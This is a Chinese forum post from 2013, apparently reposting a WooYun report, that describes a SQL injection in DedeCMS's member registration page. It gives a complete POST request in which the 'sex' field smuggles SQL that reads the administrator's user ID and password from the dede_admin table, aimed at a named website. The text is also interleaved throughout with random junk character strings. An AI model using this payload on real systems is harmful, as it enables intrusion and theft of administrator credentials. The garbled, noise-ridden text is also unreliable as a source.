漏洞类型: SQL注射漏洞- @' P5 {: Z h2 r
简要描述:
% D4 z* x* ~( ~$ J" P: y3 C
. v' A8 g/ V: P! c N/ `9 U需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.1 r& u. P6 B" k+ U! u. H. f
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.# n$ {' A8 `- a6 \0 j8 ~
详细说明:跟这个漏洞
" h3 C2 T- Q6 `3 j* A$ p
- n9 c% H! d5 q9 u: a' c# j1 a) n2 QWooYun: Dedecms SQL注射导致审核机制绕过漏洞
; U8 z% b5 B3 h9 p8 x( `' W7 e是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
) m( v! Q% G2 SPOST提交以下数据,其实不用POST提交的,这样隐蔽点.( S" m* n. M: O
3 M; L9 r9 d8 h! L1 L1 |www.political-security.com/member/reg_new.php
) P/ a. e- _3 b, S% p# S9 L
2 H3 h, @7 A& ZPOST) c& H' I; H! a" P7 a$ u% d) y$ u8 R
+ \$ \$ W8 H% K K/ ldopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
3 ~$ |7 e, J! u% l- K- s6 nuserid=c4rp3nt3r&uname=c4rp3nt3r
$ y: I. c. h+ t D6 j&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss) _% n9 t7 r- i4 z" E. M
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
- H `% H* J9 u(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');6 g8 y8 }' W" |! o l' E, n( }
%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对